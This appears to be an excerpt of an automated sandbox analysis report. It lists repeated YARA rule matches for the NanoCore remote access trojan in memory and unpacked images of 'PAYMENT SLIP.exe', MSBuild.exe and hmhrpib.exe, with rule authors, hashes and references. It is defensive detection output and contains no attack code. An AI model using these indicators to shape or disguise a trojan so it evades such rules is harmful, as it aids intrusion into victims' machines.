        Source: 00000014.00000002.745571478.0000000003050000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000002.912631638.0000000005810000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000002.912631638.0000000005810000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000013.00000002.745514113.00000000030B1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000002.910428872.00000000017E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000002.910428872.00000000017E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000013.00000002.744233608.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000013.00000002.744233608.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000002.909543177.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000002.909543177.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: PAYMENT SLIP.exe PID: 5704, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: PAYMENT SLIP.exe PID: 5704, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: MSBuild.exe PID: 6948, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: MSBuild.exe PID: 6948, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: PAYMENT SLIP.exe PID: 6804, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: PAYMENT SLIP.exe PID: 6804, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: hmhrpib.exe PID: 6376, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: hmhrpib.exe PID: 6376, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: hmhrpib.exe PID: 6024, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: hmhrpib.exe PID: 6024, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: MSBuild.exe PID: 6940, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: MSBuild.exe PID: 6940, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: PAYMENT SLIP.exe PID: 6900, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: PAYMENT SLIP.exe PID: 6900, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: MSBuild.exe PID: 6372, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: MSBuild.exe PID: 6372, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 6.2.PAYMENT SLIP.exe.3160000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.PAYMENT SLIP.exe.3160000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 6.2.PAYMENT SLIP.exe.3160000.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 10.2.PAYMENT SLIP.exe.24e0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 10.2.PAYMENT SLIP.exe.24e0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 10.2.PAYMENT SLIP.exe.24e0000.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.MSBuild.exe.48f0272.27.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.48f0272.27.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.48632ce.24.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.48632ce.24.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.450c0f1.20.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.450c0f1.20.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.17d0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.17d0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.MSBuild.exe.2f33c74.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.MSBuild.exe.2f33c74.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.46658d0.22.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.46658d0.22.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 1.2.PAYMENT SLIP.exe.2400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.PAYMENT SLIP.exe.2400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 1.2.PAYMENT SLIP.exe.2400000.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.MSBuild.exe.184e8a4.13.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.184e8a4.13.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.1840000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.1840000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.3524cf0.18.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.3524cf0.18.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.17f0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.17f0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.46574b4.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.46574b4.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.48f4f11.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.48f4f11.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.17e0000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.17e0000.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.48f0272.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.48f0272.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.34b12fc.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.34b12fc.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.1810000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.1810000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.1430000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.1430000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.1870000.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.1870000.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 20.2.PAYMENT SLIP.exe.3050000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 20.2.PAYMENT SLIP.exe.3050000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 20.2.PAYMENT SLIP.exe.3050000.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.MSBuild.exe.4507ac8.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.4507ac8.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.1450000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.1450000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.5810000.29.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.5810000.29.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.48e703e.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
